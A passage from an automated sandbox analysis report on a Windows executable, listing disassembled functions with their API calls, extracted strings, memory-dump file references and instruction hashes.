                                                                                          • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                          • Instruction ID: ec318953cf30b414ba96092af1354e7c019eb0b72bd5331a3d0c97386dbe84e6
                                                                                          • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                          • Instruction Fuzzy Hash: C8014C32400549FFCF226F59CC45EDA3BBAFF58754F094015FA18A5120C332E8A1EBA1
                                                                                          APIs
                                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00890B66
                                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00890B6B
                                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00890B70
                                                                                            • Part of subcall function 00891C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00891C1F
                                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00890B85
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                          • String ID:
                                                                                          • API String ID: 1761009282-0
                                                                                          • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                          • Instruction ID: 9d3b0379393c440cfe76274445b925ce0758b6c5e63c2a6940cc462d540d98e4
                                                                                          • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                          • Instruction Fuzzy Hash: 12C04C6814C2465C1C203ABC664A1AD0380FE62BEDB8C51C5FC96D74139E06440A6837
                                                                                          APIs
                                                                                            • Part of subcall function 00888BA5: GetDC.USER32(00000000), ref: 00888BA9
                                                                                            • Part of subcall function 00888BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00888BB4
                                                                                            • Part of subcall function 00888BA5: ReleaseDC.USER32(00000000,00000000), ref: 00888BBF
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00888D24
                                                                                            • Part of subcall function 00888EEA: GetDC.USER32(00000000), ref: 00888EF3
                                                                                            • Part of subcall function 00888EEA: GetObjectW.GDI32(?,00000018,?), ref: 00888F22
                                                                                            • Part of subcall function 00888EEA: ReleaseDC.USER32(00000000,?), ref: 00888FB6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                          • String ID: (
                                                                                          • API String ID: 1061551593-3887548279
                                                                                          • Opcode ID: f44bb6c3562513dda7020e6820a051beb997543d8e66d3d8cd7e3ba6e9fb5062
                                                                                          • Instruction ID: 3ea92859cf16da61aacc8681df46b8b875e4328d43c7d9cf3449b1b59d78f199
                                                                                          • Opcode Fuzzy Hash: f44bb6c3562513dda7020e6820a051beb997543d8e66d3d8cd7e3ba6e9fb5062
                                                                                          • Instruction Fuzzy Hash: B2610271204215EFD214EF68C888E6BBBE9FF89704F50491DF599C7261DB31E805CB62
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: _swprintf
                                                                                          • String ID: %ls$%s: %s
                                                                                          • API String ID: 589789837-2259941744
                                                                                          • Opcode ID: 0dcff6691d6cf492cd42665e05642a23431d97634e0474ac1bdabf6c6ff25cab
                                                                                          • Instruction ID: ec4fe46f5e45ee316d3f2997c5e1c873f255746048623bfe29b659c7d8fa53b4
                                                                                          • Opcode Fuzzy Hash: 0dcff6691d6cf492cd42665e05642a23431d97634e0474ac1bdabf6c6ff25cab
                                                                                          • Instruction Fuzzy Hash: 1251B63158C318FAEAE236948C4AF357655FF45B08F60C40AB3DAE44E6C6D1985C6F1B
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0087761E
                                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00877799
                                                                                            • Part of subcall function 0087A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A0D7
                                                                                            • Part of subcall function 0087A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00879EF9,?,?,?,00879D92,?,00000001,00000000,?,?), ref: 0087A108
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Attributes$H_prologTime
                                                                                          • String ID: :
                                                                                          • API String ID: 1861295151-336475711
                                                                                          • Opcode ID: 882c107a98291da641ca5b52597748c0d0a7dbaf5d2c3fb80f016460b6df1160
                                                                                          • Instruction ID: de6db9980190bc2799407186487f804485d3b45a208e31757ae11fe435f43eb5
                                                                                          • Opcode Fuzzy Hash: 882c107a98291da641ca5b52597748c0d0a7dbaf5d2c3fb80f016460b6df1160
                                                                                          • Instruction Fuzzy Hash: D541B171804658A9DB28EB68DC45EEE737CFF45340F0080A9B64DE208ADB30DF85CB62
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: UNC$\\?\
                                                                                          • API String ID: 0-253988292
                                                                                          • Opcode ID: 48455bd04064a0c8d14ed6584d7c5b331e91de7488ac19ca21ae609514caf7e4
                                                                                          • Instruction ID: fc4e8f741de9a8deddaaacb581a610aa829571831bd7bde76c5affb85de932f5
                                                                                          • Opcode Fuzzy Hash: 48455bd04064a0c8d14ed6584d7c5b331e91de7488ac19ca21ae609514caf7e4
                                                                                          • Instruction Fuzzy Hash: E1419231400219AADF21AF26DC42FEE77AAFF01350F10C166F95CE325AE771D9808BA1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Shell.Explorer$about:blank
                                                                                          • API String ID: 0-874089819
                                                                                          • Opcode ID: 375b23bfaa6c8618006e95a0269167e541838f36978e2e127f04650e7542bab1
                                                                                          • Instruction ID: dc0acbe324721b96f0952f4b5ec17a9ffa15b15b395bc97c74ecd5cdccd25312
                                                                                          • Opcode Fuzzy Hash: 375b23bfaa6c8618006e95a0269167e541838f36978e2e127f04650e7542bab1
                                                                                          • Instruction Fuzzy Hash: 8D219D75300A06EFE704BF64C894E2AB768FF85710B948229F115CB682CF71EC44CBA1
                                                                                          APIs
                                                                                            • Part of subcall function 0087DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0087DED4
                                                                                            • Part of subcall function 0087DEB5: GetProcAddress.KERNEL32(008B1E58,CryptUnprotectMemory), ref: 0087DEE4
                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,0087DF2E), ref: 0087DFB5
                                                                                          Strings
                                                                                          • CryptProtectMemory failed, xrefs: 0087DF75
                                                                                          • CryptUnprotectMemory failed, xrefs: 0087DFAD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$CurrentProcess
                                                                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                          • API String ID: 2190909847-396321323
                                                                                          • Opcode ID: 5235d1d7bb18a760fa3fe7a86a7a20fcfba6bf31a3b0bb00a60b0dfff6a785f7
                                                                                          • Instruction ID: b5b0e4e4b82032ad87401a85b76c87589b6d7f77c5f00229274ceab047271d41
                                                                                          • Opcode Fuzzy Hash: 5235d1d7bb18a760fa3fe7a86a7a20fcfba6bf31a3b0bb00a60b0dfff6a785f7
                                                                                          • Instruction Fuzzy Hash: C8117A7130C7162BEB119B39CC10E6A33A9FF95B58B04C019F80EDF18AEF60EC008691
                                                                                          APIs
                                                                                            • Part of subcall function 0087CED7: GetWindowRect.USER32(?,?), ref: 0087CF0E
                                                                                            • Part of subcall function 0087CED7: GetClientRect.USER32(?,?), ref: 0087CF1A
                                                                                            • Part of subcall function 0087CED7: GetWindowLongW.USER32(?,000000F0), ref: 0087CFBB
                                                                                            • Part of subcall function 0087CED7: GetWindowRect.USER32(?,?), ref: 0087CFE8
                                                                                            • Part of subcall function 0087CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0087D007
                                                                                          • GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                                                          • SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Rect$Text$ClientItemLong
                                                                                          • String ID: 0
                                                                                          • API String ID: 660763476-4108050209
                                                                                          • Opcode ID: bcf0eefe78aea653b9cf3420578d7393ed0078093e6681b03307eb6eff8c81bd
                                                                                          • Instruction ID: 1ab7550022c24a78b0ae9b531243366a383dfe9547250092aeace982739f2747
                                                                                          • Opcode Fuzzy Hash: bcf0eefe78aea653b9cf3420578d7393ed0078093e6681b03307eb6eff8c81bd
                                                                                          • Instruction Fuzzy Hash: 6FF081B1540248ABEF164F64C80DAE93B59FB05754F08C014FE4CD5E95CB7DC455EB25
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,0087FD0B,?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FACD
                                                                                          • GetLastError.KERNEL32(?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FAD9
                                                                                            • Part of subcall function 00876DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00876DF1
                                                                                          Strings
                                                                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0087FAE2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                          • API String ID: 1091760877-2248577382
                                                                                          • Opcode ID: d184ac91ad0f4e050bf067d041880faadbb7e6de1e43dd3a3f651b7eff22738f
                                                                                          • Instruction ID: 8d51315843f6af177fd79d3b42ea0c59ee42eb59dc47616d2bd6aad79d552ecf
                                                                                          • Opcode Fuzzy Hash: d184ac91ad0f4e050bf067d041880faadbb7e6de1e43dd3a3f651b7eff22738f
                                                                                          • Instruction Fuzzy Hash: 15D05B7150883127E61137285C06E6E7D04FB13770F344715F13DE55E9EF554C514692